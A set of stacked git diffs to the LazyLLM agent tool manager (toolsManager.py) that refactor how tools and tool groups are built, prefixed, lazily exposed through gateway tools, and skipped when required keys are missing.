+                        raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
+                    self._tool_call[name] = tool
 
     def _transform_to_openai_function(self):
         if not isinstance(self._tools, List):

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -322,9 +322,6 @@ class ToolGroup:
                                 f'got {type(item)}')
             self._children.append(built)
 
-    def should_skip(self) -> bool:
-        return False
-
     def get_flat_tools(self, _prefix: Optional[str] = None) -> Dict[str, 'ModuleTool']:
         effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
             else (_prefix or self._prefix)
@@ -337,13 +334,14 @@ class ToolGroup:
                 result[key] = child
         return result
 
-    def get_child_descriptions(self, _prefix: Optional[str] = None) -> List[Dict]:
+    def get_child_descriptions(self, _prefix: Optional[str] = None,
+                               active_groups: Optional[Set[str]] = None) -> List[Dict]:
         effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
             else (_prefix or self._prefix)
         descs = []
         for child in self._children:
             if isinstance(child, ToolGroup):
-                descs.extend(child.get_description(_prefix=effective))
+                descs.extend(child.get_description(_prefix=effective, active_groups=active_groups))
             else:
                 desc = _build_tool_desc(child)
                 if effective:
@@ -361,9 +359,10 @@ class ToolGroup:
             }
         }
 
-    def get_description(self, _prefix: Optional[str] = None) -> List[Dict]:
-        if not self._lazy:
-            return self.get_child_descriptions(_prefix)
+    def get_description(self, _prefix: Optional[str] = None,
+                        active_groups: Optional[Set[str]] = None) -> List[Dict]:
+        if not self._lazy or (active_groups is not None and self._name in active_groups):
+            return self.get_child_descriptions(_prefix, active_groups)
         return [self.get_gateway_desc()]
 
     def make_gateway_tool(self, manager: 'ToolManager') -> 'ModuleTool':
@@ -431,9 +430,10 @@ class InstanceToolGroup(ToolGroup):
         sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
         return not any(bool(self._resolve_one_key(src)) for src in sources)
 
-    def get_description(self, _prefix: Optional[str] = None) -> List[Dict]:
+    def get_description(self, _prefix: Optional[str] = None,
+                        active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if self.should_skip(): return []
-        return super().get_description(_prefix)
+        return super().get_description(_prefix, active_groups)
 
 
 TOOL_CALL_FORMAT_EXAMPLE = (
@@ -499,16 +499,14 @@ class ToolManager(ModuleBase):
 
     @property
     def tools_description(self) -> List[Dict]:
-        static = [x for item in self._tools_desc for x in (item() if callable(item) else [item])]
         active_key = f'_active_groups_{self._module_id}'
         try:
             workspace = lazyllm_locals['_lazyllm_agent'].get('workspace', {})
         except Exception:
             workspace = {}
-        active_groups = workspace.get(active_key, [])
-        extra = [desc for gname in active_groups if gname in self._tool_groups
-                 for desc in self._tool_groups[gname].get_child_descriptions()]
-        return static + extra
+        active_groups = set(workspace.get(active_key, []))
+        return [x for item in self._tools_desc
+                for x in (item(active_groups=active_groups) if callable(item) else [item])]
 
     @property
     def tools_info(self):
@@ -539,7 +537,7 @@ class ToolManager(ModuleBase):
                         if name in self._tool_call:
                             raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
                         self._tool_call[name] = tool
-                    if item._lazy and not item.should_skip():
+                    if item._lazy:
                         gateway = item.make_gateway_tool(self)
                         if gateway.name in self._tool_call:
                             raise ValueError(

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -307,7 +307,12 @@ def _build_tool_desc(tool: 'ModuleTool') -> Dict:
     }
 
 
-class ToolGroup:
+class ToolContainer:
+    def get_flat_tools(self) -> Dict[str, 'ModuleTool']: raise NotImplementedError
+    def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]: raise NotImplementedError
+
+
+class ToolGroup(ToolContainer):
     def __init__(self, tools: List[Any], name: str, desc: str = '', lazy: bool = True,
                  prefix: Optional[Union[bool, str]] = True, _outer_prefix: Optional[str] = None):
         self._name, self._desc, self._lazy = name, desc, lazy
@@ -354,7 +359,7 @@ class ToolGroup:
     def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if not self._lazy or (active_groups is not None and self._name in active_groups):
             return [x for item in self._expanded_descs
-                    for x in (item.get_description(active_groups) if isinstance(item, ToolGroup) else [item])]
+                    for x in (item.get_description(active_groups) if isinstance(item, ToolContainer) else [item])]
         return [self._gateway_desc]
 
     def _collect_leaf_names(self) -> List[str]:
@@ -384,20 +389,26 @@ class ToolGroup:
         return tool
 
 
-class InstanceToolGroup(ToolGroup):
-    def __init__(self, instance: Any,
-                 key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
-        if key_source is None: key_source = getattr(type(instance), '__key_source__', None)
-        self._instance = instance
-        self._key_source = key_source
-        tools = [MethodModuleTool(instance, m) for m in instance.__public_apis__]
-        name = instance.__class__.__name__
-        desc = getattr(type(instance), '__doc__', '') or ''
-        super().__init__(tools=tools, name=name, desc=desc, lazy=True)
+class SkipMixin:
+    @staticmethod
+    def _normalize_source(src):
+        if callable(src):
+            try:
+                sig = inspect.signature(src)
+                params = [p for p in sig.parameters.values()
+                          if p.default is inspect.Parameter.empty
+                          and p.kind not in (inspect.Parameter.VAR_POSITIONAL, inspect.Parameter.VAR_KEYWORD)]
+            except (ValueError, TypeError):
+                params = []
+            if not params:
+                return lambda _inst: src()
+        return src
 
-    @property
-    def _tools(self) -> Dict[str, 'ModuleTool']:
-        return {child.name: child for child in self._children if isinstance(child, ModuleTool)}
+    def __init__(self, key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
+        if isinstance(key_source, list):
+            self._key_source = [SkipMixin._normalize_source(s) for s in key_source]
+        else:
+            self._key_source = SkipMixin._normalize_source(key_source) if key_source is not None else None
 
     def _resolve_key_by_string(self, source: str) -> Optional[str]:
         try:
@@ -413,7 +424,7 @@ class InstanceToolGroup(ToolGroup):
         return None
 
     def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
-        if callable(source): return source(self._instance) or None
+        if callable(source): return source(getattr(self, '_instance', None)) or None
         return self._resolve_key_by_string(source)
 
     def should_skip(self) -> bool:
@@ -421,9 +432,40 @@ class InstanceToolGroup(ToolGroup):
         sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
         return not any(bool(self._resolve_one_key(src)) for src in sources)
 
+
+class InstanceToolGroup(SkipMixin, ToolGroup):
+    def __init__(self, instance: Any,
+                 key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
+        if key_source is None: key_source = getattr(type(instance), '__key_source__', None)
+        self._instance = instance
+        SkipMixin.__init__(self, key_source)
+        tools = [MethodModuleTool(instance, m) for m in instance.__public_apis__]
+        name = instance.__class__.__name__
+        desc = getattr(type(instance), '__doc__', '') or ''
+        ToolGroup.__init__(self, tools=tools, name=name, desc=desc, lazy=True)
+
+    @property
+    def _tools(self) -> Dict[str, 'ModuleTool']:
+        return {child.name: child for child in self._children if isinstance(child, ModuleTool)}
+
     def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if self.should_skip(): return []
         return super().get_description(active_groups)
+
+
+class ToolGroupWrapper(SkipMixin, ToolContainer):
+    def __init__(self, tool: Any, key_source: Union[str, Callable, List[Union[str, Callable]], None]):
+        SkipMixin.__init__(self, key_source)
+        self._inner = _build_tool_from_element(tool)
+
+    def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
+        return self._inner.get_flat_tools() if isinstance(self._inner, ToolContainer) \
+            else {self._inner.name: self._inner}
+
+    def get_description(self, active_groups: Optional[Set[str]] = None) -> List[Dict]:
+        if self.should_skip(): return []
+        return self._inner.get_description(active_groups) if isinstance(self._inner, ToolContainer) \
+            else [_build_tool_desc(self._inner)]
 
 
 TOOL_CALL_FORMAT_EXAMPLE = (
@@ -438,11 +480,11 @@ def _build_tool_from_element(
         return _load_tool_by_name(element)
     if isinstance(element, (ToolGroup, ModuleTool)):
         return element
-    if isinstance(element, tuple) and len(element) == 2:
-        instance, key_source = element
-        if not hasattr(instance, '__public_apis__'):
-            raise ValueError(f'Instance {instance!r} does not have __public_apis__')
-        return InstanceToolGroup(instance, key_source)
+    if isinstance(element, (tuple, list)) and len(element) == 2:
+        tool, key_source = element
+        if hasattr(tool, '__public_apis__'):
+            return InstanceToolGroup(tool, key_source)
+        return ToolGroupWrapper(tool, key_source)
     if hasattr(element, '__public_apis__') and not isinstance(element, (ToolGroup, ModuleTool)):
         return InstanceToolGroup(element)
     if isinstance(element, dict):
@@ -491,7 +533,7 @@ class ToolManager(ModuleBase):
         active_groups = set(workspace.get('_active_groups', []))
         return [x for item in self._tools_desc
                 for x in (item.get_description(active_groups=active_groups)
-                          if isinstance(item, ToolGroup) else item() if callable(item) else [item])]
+                          if isinstance(item, ToolContainer) else item() if callable(item) else [item])]
 
     @property
     def tools_info(self):
@@ -516,7 +558,7 @@ class ToolManager(ModuleBase):
         if isinstance(self._tools, List):
             self._tool_call: Dict[str, ModuleTool] = {}
             for item in self._tools:
-                items = item.get_flat_tools() if isinstance(item, ToolGroup) else {item.name: item}
+                items = item.get_flat_tools() if isinstance(item, ToolContainer) else {item.name: item}
                 for name, tool in items.items():
                     if name in self._tool_call:
                         raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
@@ -528,7 +570,7 @@ class ToolManager(ModuleBase):
 
         format_tools = []
         for item in self._tools:
-            if isinstance(item, ToolGroup):
+            if isinstance(item, ToolContainer):
                 format_tools.append(item)
             else:
                 try:

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -490,7 +490,8 @@ class ToolManager(ModuleBase):
             workspace = {}
         active_groups = set(workspace.get('_active_groups', []))
         return [x for item in self._tools_desc
-                for x in (item(active_groups=active_groups) if callable(item) else [item])]
+                for x in (item.get_description(active_groups=active_groups)
+                          if isinstance(item, ToolGroup) else item() if callable(item) else [item])]
 
     @property
     def tools_info(self):
@@ -528,7 +529,7 @@ class ToolManager(ModuleBase):
         format_tools = []
         for item in self._tools:
             if isinstance(item, ToolGroup):
-                format_tools.append(item.get_description)
+                format_tools.append(item)
             else:
                 try:
                     format_tools.append(_build_tool_desc(item))

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -249,6 +249,8 @@ if 'tool' not in LazyLLMRegisterMetaClass.all_clses:
     register.new_group('tool')
 if 'builtin_tools' not in LazyLLMRegisterMetaClass.all_clses:
     register.new_group('builtin_tools')
+if 'tmp_tool' not in LazyLLMRegisterMetaClass.all_clses:
+    register.new_group('tmp_tool')
 
 
 class MethodModuleTool(ModuleTool):
@@ -315,24 +317,9 @@ class ToolGroup:
         self._children: List[Union['ModuleTool', 'ToolGroup']] = []
         self._gateway_tool: Optional['ModuleTool'] = None
         for item in tools:
-            if isinstance(item, dict):
-                assert 'name' in item, "ToolGroup dict must have a 'name' field"
-                assert 'tools' in item, "ToolGroup dict must have a 'tools' field"
-                self._children.append(ToolGroup(
-                    tools=item['tools'], name=item['name'],
-                    desc=item.get('desc', ''), lazy=item.get('lazy', True),
-                ))
-            elif isinstance(item, ToolGroup):
-                self._children.append(item)
-            elif isinstance(item, ModuleTool):
-                self._children.append(item)
-            elif callable(item):
-                if 'tmp_tool' not in LazyLLMRegisterMetaClass.all_clses:
-                    register.new_group('tmp_tool')
-                register('tmp_tool')(item)
-                tool = getattr(lazyllm.tmp_tool, item.__name__)()
-                lazyllm.tmp_tool.remove(item.__name__)
-                self._children.append(tool)
+            built = _build_tool_from_element(item)
+            if built is not None:
+                self._children.append(built)
             else:
                 raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
                                 f'got {type(item)}')
@@ -453,6 +440,23 @@ TOOL_CALL_FORMAT_EXAMPLE = (
 )
 
 
+def _build_tool_from_element(element: Any) -> Optional[Union['ModuleTool', 'ToolGroup']]:
+    if isinstance(element, (ToolGroup, ModuleTool)):
+        return element
+    if isinstance(element, dict):
+        assert 'name' in element, "ToolGroup dict must have a 'name' field"
+        assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
+        assert 'desc' in element, "ToolGroup dict must have a 'desc' field"
+        return ToolGroup(tools=element['tools'], name=element['name'],
+                         desc=element['desc'], lazy=element.get('lazy', True))
+    if callable(element):
+        register('tmp_tool')(element)
+        tool = getattr(lazyllm.tmp_tool, element.__name__)()
+        lazyllm.tmp_tool.remove(element.__name__)
+        return tool
+    return None
+
+
 class ToolManager(ModuleBase):
     def __init__(self, tools: List[Union[str, Callable]], return_trace: bool = False, sandbox=None):
         super().__init__(return_trace=return_trace)
@@ -471,37 +475,21 @@ class ToolManager(ModuleBase):
         return target()
 
     def _load_tools(self, tools: List[Union[str, Callable]]):
-        if 'tmp_tool' not in LazyLLMRegisterMetaClass.all_clses:
-            register.new_group('tmp_tool')
-
         _tools = []
         for element in tools:
             if isinstance(element, str):
                 _tools.append(self._load_tool_by_name(element))
-            elif isinstance(element, ToolGroup):
-                _tools.append(element)
-            elif isinstance(element, ModuleTool):
-                _tools.append(element)
-            elif isinstance(element, dict):
-                assert 'name' in element, "ToolGroup dict must have a 'name' field"
-                assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
-                _tools.append(ToolGroup(
-                    tools=element['tools'], name=element['name'],
-                    desc=element.get('desc', ''), lazy=element.get('lazy', True),
-                ))
             elif isinstance(element, tuple) and len(element) == 2:
                 instance, key_source = element
                 if not hasattr(instance, '__public_apis__'):
                     raise ValueError(f'Instance {instance!r} does not have __public_apis__')
                 _tools.append(InstanceToolGroup(instance, key_source))
-            elif hasattr(element, '__public_apis__'):
+            elif hasattr(element, '__public_apis__') and not isinstance(element, (ToolGroup, ModuleTool)):
                 _tools.append(InstanceToolGroup(element))
-            elif isinstance(element, Callable):
-                # just to convert `element` to the internal type in `Register`
-                register('tmp_tool')(element)
-                _tools.append(getattr(lazyllm.tmp_tool, element.__name__)())
-                lazyllm.tmp_tool.remove(element.__name__)
-
+            else:
+                built = _build_tool_from_element(element)
+                if built is not None:
+                    _tools.append(built)
         return _tools
 
     @property

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -314,18 +314,20 @@ class ToolGroup:
         self._prefix: Optional[str] = name if prefix is True or prefix == '' \
             else None if prefix is False or prefix is None else prefix
         self._children: List[Union['ModuleTool', 'ToolGroup']] = []
-        self._gateway_tool: Optional['ModuleTool'] = None
         for item in tools:
             built = _build_tool_from_element(item)
             if built is None:
                 raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
                                 f'got {type(item)}')
             self._children.append(built)
+        self._gateway_tool: Optional['ModuleTool'] = self.make_gateway_tool() if lazy else None
 
     def get_flat_tools(self, _prefix: Optional[str] = None) -> Dict[str, 'ModuleTool']:
         effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
             else (_prefix or self._prefix)
         result: Dict[str, ModuleTool] = {}
+        if self._gateway_tool is not None:
+            result[self._gateway_tool.name] = self._gateway_tool
         for child in self._children:
             if isinstance(child, ToolGroup):
                 result.update(child.get_flat_tools(effective))
@@ -349,47 +351,44 @@ class ToolGroup:
                 descs.append(desc)
         return descs
 
-    def get_gateway_desc(self) -> Dict:
-        return {
-            'type': 'function',
-            'function': {
-                'name': f'get_{self._name}_methods',
-                'description': self._desc or f'Get available methods of {self._name}.',
-                'parameters': {'type': 'object', 'properties': {}, 'required': []},
-            }
-        }
-
     def get_description(self, _prefix: Optional[str] = None,
                         active_groups: Optional[Set[str]] = None) -> List[Dict]:
         if not self._lazy or (active_groups is not None and self._name in active_groups):
             return self.get_child_descriptions(_prefix, active_groups)
-        return [self.get_gateway_desc()]
+        return [_build_tool_desc(self._gateway_tool)]
 
-    def make_gateway_tool(self, manager: 'ToolManager') -> 'ModuleTool':
+    def _collect_leaf_names(self, _prefix: Optional[str] = None) -> List[str]:
+        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
+            else (_prefix or self._prefix)
+        names = []
+        for child in self._children:
+            if isinstance(child, ToolGroup):
+                names.extend(child._collect_leaf_names(effective))
+            else:
+                names.append(f'{effective}_{child.name}' if effective else child.name)
+        return names
+
+    def make_gateway_tool(self) -> 'ModuleTool':
         group_name = self._name
-        module_id = manager._module_id
-        child_names = list(self.get_flat_tools().keys())
+        child_names = self._collect_leaf_names()
 
         def _gateway_apply() -> str:
-            active_key = f'_active_groups_{module_id}'
             workspace = lazyllm_locals['_lazyllm_agent'].get('workspace', {})
-            active = workspace.setdefault(active_key, [])
+            active = workspace.setdefault('_active_groups', [])
             if group_name not in active:
                 active.append(group_name)
             return (f'Activated tool group "{group_name}". '
                     f'Available tools: {", ".join(child_names)}')
 
-        _gateway_apply.__doc__ = (
-            f'Get available methods of {group_name}.\n\n'
-            f'Returns:\n    str: List of available tool names in this group.'
-        )
+        short_desc = docstring_parser.parse(self._desc).short_description if self._desc else ''
+        desc = f'Get available methods of {group_name}. {short_desc or ""}'
+        _gateway_apply.__doc__ = (f'{desc}\n\nReturns:\n    str: List of available tool names in this group.')
         _gateway_apply.__name__ = f'get_{group_name}_methods'
 
         register('tmp_tool')(_gateway_apply)
         tool_cls = getattr(lazyllm.tmp_tool, _gateway_apply.__name__)
         tool = tool_cls()
         lazyllm.tmp_tool.remove(_gateway_apply.__name__)
-        self._gateway_tool = tool
         return tool
 
 
@@ -499,12 +498,11 @@ class ToolManager(ModuleBase):
 
     @property
     def tools_description(self) -> List[Dict]:
-        active_key = f'_active_groups_{self._module_id}'
         try:
             workspace = lazyllm_locals['_lazyllm_agent'].get('workspace', {})
         except Exception:
             workspace = {}
-        active_groups = set(workspace.get(active_key, []))
+        active_groups = set(workspace.get('_active_groups', []))
         return [x for item in self._tools_desc
                 for x in (item(active_groups=active_groups) if callable(item) else [item])]
 
@@ -530,37 +528,16 @@ class ToolManager(ModuleBase):
     def _format_tools(self):
         if isinstance(self._tools, List):
             self._tool_call: Dict[str, ModuleTool] = {}
-            self._tool_groups: Dict[str, ToolGroup] = {}
             for item in self._tools:
                 if isinstance(item, ToolGroup):
                     for name, tool in item.get_flat_tools().items():
                         if name in self._tool_call:
                             raise ValueError(f'Duplicate tool name [{name}]. Tool names must be unique.')
                         self._tool_call[name] = tool
-                    if item._lazy:
-                        gateway = item.make_gateway_tool(self)
-                        if gateway.name in self._tool_call:
-                            raise ValueError(
-                                f'Duplicate tool name [{gateway.name}]. Tool names must be unique.')
-                        self._tool_call[gateway.name] = gateway
-                        self._tool_groups[item._name] = item
-                        self._register_sub_groups(item)
                 else:
                     if item.name in self._tool_call:
                         raise ValueError(f'Duplicate tool name [{item.name}]. Tool names must be unique.')
                     self._tool_call[item.name] = item
-
-    def _register_sub_groups(self, group: ToolGroup):
-        for child in group._children:
-            if isinstance(child, ToolGroup):
-                if child._lazy:
-                    gateway = child.make_gateway_tool(self)
-                    if gateway.name not in self._tool_call:
-                        self._tool_call[gateway.name] = gateway
-                    self._tool_groups[child._name] = child
-                    self._register_sub_groups(child)
-                else:
-                    self._register_sub_groups(child)
 
     def _transform_to_openai_function(self):
         if not isinstance(self._tools, List):

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -309,56 +309,46 @@ def _build_tool_desc(tool: 'ModuleTool') -> Dict:
 
 class ToolGroup:
     def __init__(self, tools: List[Any], name: str, desc: str = '', lazy: bool = True,
-                 key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
-        self._name = name
-        self._desc = desc
-        self._lazy = lazy
-        self._key_source = key_source
+                 prefix: Optional[Union[bool, str]] = None):
+        self._name, self._desc, self._lazy = name, desc, lazy
+        self._prefix: Optional[str] = name if prefix is True or prefix == '' \
+            else None if prefix is False or prefix is None else prefix
         self._children: List[Union['ModuleTool', 'ToolGroup']] = []
         self._gateway_tool: Optional['ModuleTool'] = None
         for item in tools:
             built = _build_tool_from_element(item)
-            if built is not None:
-                self._children.append(built)
-            else:
+            if built is None:
                 raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
                                 f'got {type(item)}')
+            self._children.append(built)
 
     def should_skip(self) -> bool:
-        if self._key_source is None: return False
-        sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
-        return not any(bool(self._resolve_one_key(src)) for src in sources)
+        return False
 
-    def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
-        if callable(source): return source(self) or None
-        try:
-            if '.' not in source:
-                return lazyllm.globals.config[source] or None
-            prefix, _, attr = source.partition('.')
-            if prefix == 'env': return os.environ.get(attr) or None
-            elif prefix == 'config': return lazyllm.config[attr] or None
-            elif prefix == 'globals':
-                if attr.startswith('config.'): return lazyllm.globals.config[attr[len('config.'):]] or None
-                else: return lazyllm.globals[attr] or None
-        except Exception: pass
-        return None
-
-    def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
+    def get_flat_tools(self, _prefix: Optional[str] = None) -> Dict[str, 'ModuleTool']:
+        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
+            else (_prefix or self._prefix)
         result: Dict[str, ModuleTool] = {}
         for child in self._children:
             if isinstance(child, ToolGroup):
-                result.update(child.get_flat_tools())
+                result.update(child.get_flat_tools(effective))
             else:
-                result[child.name] = child
+                key = f'{effective}_{child.name}' if effective else child.name
+                result[key] = child
         return result
 
-    def get_child_descriptions(self) -> List[Dict]:
+    def get_child_descriptions(self, _prefix: Optional[str] = None) -> List[Dict]:
+        effective = f'{_prefix}_{self._prefix}' if _prefix and self._prefix \
+            else (_prefix or self._prefix)
         descs = []
         for child in self._children:
             if isinstance(child, ToolGroup):
-                descs.extend(child.get_description())
+                descs.extend(child.get_description(_prefix=effective))
             else:
-                descs.append(_build_tool_desc(child))
+                desc = _build_tool_desc(child)
+                if effective:
+                    desc['function']['name'] = f'{effective}_{child.name}'
+                descs.append(desc)
         return descs
 
     def get_gateway_desc(self) -> Dict:
@@ -371,10 +361,9 @@ class ToolGroup:
             }
         }
 
-    def get_description(self) -> List[Dict]:
-        if self.should_skip(): return []
+    def get_description(self, _prefix: Optional[str] = None) -> List[Dict]:
         if not self._lazy:
-            return self.get_child_descriptions()
+            return self.get_child_descriptions(_prefix)
         return [self.get_gateway_desc()]
 
     def make_gateway_tool(self, manager: 'ToolManager') -> 'ModuleTool':
@@ -410,17 +399,17 @@ class InstanceToolGroup(ToolGroup):
                  key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
         if key_source is None: key_source = getattr(type(instance), '__key_source__', None)
         self._instance = instance
+        self._key_source = key_source
         tools = [MethodModuleTool(instance, m) for m in instance.__public_apis__]
         name = instance.__class__.__name__
         desc = getattr(type(instance), '__doc__', '') or ''
-        super().__init__(tools=tools, name=name, desc=desc, lazy=True, key_source=key_source)
+        super().__init__(tools=tools, name=name, desc=desc, lazy=True)
 
     @property
     def _tools(self) -> Dict[str, 'ModuleTool']:
         return {child.name: child for child in self._children if isinstance(child, ModuleTool)}
 
-    def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
-        if callable(source): return source(self._instance) or None
+    def _resolve_key_by_string(self, source: str) -> Optional[str]:
         try:
             if '.' not in source:
                 return lazyllm.globals.config[source] or None
@@ -432,6 +421,19 @@ class InstanceToolGroup(ToolGroup):
                 else: return lazyllm.globals[attr] or None
         except Exception: pass
         return None
+
+    def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
+        if callable(source): return source(self._instance) or None
+        return self._resolve_key_by_string(source)
+
+    def should_skip(self) -> bool:
+        if self._key_source is None: return False
+        sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
+        return not any(bool(self._resolve_one_key(src)) for src in sources)
+
+    def get_description(self, _prefix: Optional[str] = None) -> List[Dict]:
+        if self.should_skip(): return []
+        return super().get_description(_prefix)
 
 
 TOOL_CALL_FORMAT_EXAMPLE = (
@@ -448,13 +450,14 @@ def _build_tool_from_element(element: Any) -> Optional[Union['ModuleTool', 'Tool
         assert 'tools' in element, "ToolGroup dict must have a 'tools' field"
         assert 'desc' in element, "ToolGroup dict must have a 'desc' field"
         return ToolGroup(tools=element['tools'], name=element['name'],
-                         desc=element['desc'], lazy=element.get('lazy', True))
+                         desc=element['desc'], lazy=element.get('lazy', True),
+                         prefix=element.get('prefix', None))
     if callable(element):
         register('tmp_tool')(element)
         tool = getattr(lazyllm.tmp_tool, element.__name__)()
         lazyllm.tmp_tool.remove(element.__name__)
         return tool
-    return None
+    raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, got {type(element)}')
 
 
 class ToolManager(ModuleBase):
@@ -487,9 +490,7 @@ class ToolManager(ModuleBase):
             elif hasattr(element, '__public_apis__') and not isinstance(element, (ToolGroup, ModuleTool)):
                 _tools.append(InstanceToolGroup(element))
             else:
-                built = _build_tool_from_element(element)
-                if built is not None:
-                    _tools.append(built)
+                _tools.append(_build_tool_from_element(element))
         return _tools
 
     @property

--- a/lazyllm/tools/agent/toolsManager.py
+++ b/lazyllm/tools/agent/toolsManager.py
@@ -10,7 +10,7 @@ from lazyllm.common.utils import SecurityVisitor
 from typing import Callable, Any, Union, Optional, get_type_hints, List, Dict, Type, Set
 import inspect
 from pydantic import create_model, BaseModel, ValidationError
-from lazyllm import LOG
+from lazyllm import LOG, locals as lazyllm_locals
 from typing import *  # noqa F403, to import all types for compile_func(), do not remove
 
 # ---------------------------------------------------------------------------- #
@@ -305,24 +305,132 @@ def _build_tool_desc(tool: 'ModuleTool') -> Dict:
     }
 
 
-class InstanceToolGroup:
-    def __init__(self, instance: Any,
+class ToolGroup:
+    def __init__(self, tools: List[Any], name: str, desc: str = '', lazy: bool = True,
                  key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
-        self._instance = instance
-        if key_source is None: key_source = getattr(type(instance), '__key_source__', None)
+        self._name = name
+        self._desc = desc
+        self._lazy = lazy
         self._key_source = key_source
-        self._tools: Dict[str, MethodModuleTool] = {
-            (instance.__class__.__name__ if m == '__call__' else f'{instance.__class__.__name__}_{m}'):
-            MethodModuleTool(instance, m) for m in instance.__public_apis__}
-        self._tool_descs: List[Dict] = [_build_tool_desc(t) for t in self._tools.values()]
+        self._children: List[Union['ModuleTool', 'ToolGroup']] = []
+        self._gateway_tool: Optional['ModuleTool'] = None
+        for item in tools:
+            if isinstance(item, dict):
+                assert 'name' in item, "ToolGroup dict must have a 'name' field"
+                assert 'tools' in item, "ToolGroup dict must have a 'tools' field"
+                self._children.append(ToolGroup(
+                    tools=item['tools'], name=item['name'],
+                    desc=item.get('desc', ''), lazy=item.get('lazy', True),
+                ))
+            elif isinstance(item, ToolGroup):
+                self._children.append(item)
+            elif isinstance(item, ModuleTool):
+                self._children.append(item)
+            elif callable(item):
+                if 'tmp_tool' not in LazyLLMRegisterMetaClass.all_clses:
+                    register.new_group('tmp_tool')
+                register('tmp_tool')(item)
+                tool = getattr(lazyllm.tmp_tool, item.__name__)()
+                lazyllm.tmp_tool.remove(item.__name__)
+                self._children.append(tool)
+            else:
+                raise TypeError(f'ToolGroup child must be a ModuleTool, ToolGroup, dict, or callable, '
+                                f'got {type(item)}')
 
     def should_skip(self) -> bool:
         if self._key_source is None: return False
         sources = self._key_source if isinstance(self._key_source, list) else [self._key_source]
         return not any(bool(self._resolve_one_key(src)) for src in sources)
 
+    def _resolve_one_key(self, source: Union[str, Callable]) -> Optional[str]:
+        if callable(source): return source(self) or None
+        try:
+            if '.' not in source:
+                return lazyllm.globals.config[source] or None
+            prefix, _, attr = source.partition('.')
+            if prefix == 'env': return os.environ.get(attr) or None
+            elif prefix == 'config': return lazyllm.config[attr] or None
+            elif prefix == 'globals':
+                if attr.startswith('config.'): return lazyllm.globals.config[attr[len('config.'):]] or None
+                else: return lazyllm.globals[attr] or None
+        except Exception: pass
+        return None
+
+    def get_flat_tools(self) -> Dict[str, 'ModuleTool']:
+        result: Dict[str, ModuleTool] = {}
+        for child in self._children:
+            if isinstance(child, ToolGroup):
+                result.update(child.get_flat_tools())
+            else:
+                result[child.name] = child
+        return result
+
+    def get_child_descriptions(self) -> List[Dict]:
+        descs = []
+        for child in self._children:
+            if isinstance(child, ToolGroup):
+                descs.extend(child.get_description())
+            else:
+                descs.append(_build_tool_desc(child))
+        return descs
+
+    def get_gateway_desc(self) -> Dict:
+        return {
+            'type': 'function',
+            'function': {
+                'name': f'get_{self._name}_methods',
+                'description': self._desc or f'Get available methods of {self._name}.',
+                'parameters': {'type': 'object', 'properties': {}, 'required': []},
+            }
+        }
+
     def get_description(self) -> List[Dict]:
-        return [] if self.should_skip() else self._tool_descs
+        if self.should_skip(): return []
+        if not self._lazy:
+            return self.get_child_descriptions()
+        return [self.get_gateway_desc()]
+
+    def make_gateway_tool(self, manager: 'ToolManager') -> 'ModuleTool':
+        group_name = self._name
+        module_id = manager._module_id
+        child_names = list(self.get_flat_tools().keys())
+
+        def _gateway_apply() -> str:
+            active_key = f'_active_groups_{module_id}'
+            workspace = lazyllm_locals['_lazyllm_agent'].get('workspace', {})
+            active = workspace.setdefault(active_key, [])
+            if group_name not in active:
+                active.append(group_name)
+            return (f'Activated tool group "{group_name}". '
+                    f'Available tools: {", ".join(child_names)}')
+
+        _gateway_apply.__doc__ = (
+            f'Get available methods of {group_name}.\n\n'
+            f'Returns:\n    str: List of available tool names in this group.'
+        )
+        _gateway_apply.__name__ = f'get_{group_name}_methods'
+
+        register('tmp_tool')(_gateway_apply)
+        tool_cls = getattr(lazyllm.tmp_tool, _gateway_apply.__name__)
+        tool = tool_cls()
+        lazyllm.tmp_tool.remove(_gateway_apply.__name__)
+        self._gateway_tool = tool
+        return tool
+
+
+class InstanceToolGroup(ToolGroup):
+    def __init__(self, instance: Any,
+                 key_source: Union[str, Callable, List[Union[str, Callable]], None] = None):
+        if key_source is None: key_source = getattr(type(instance), '__key_source__', None)
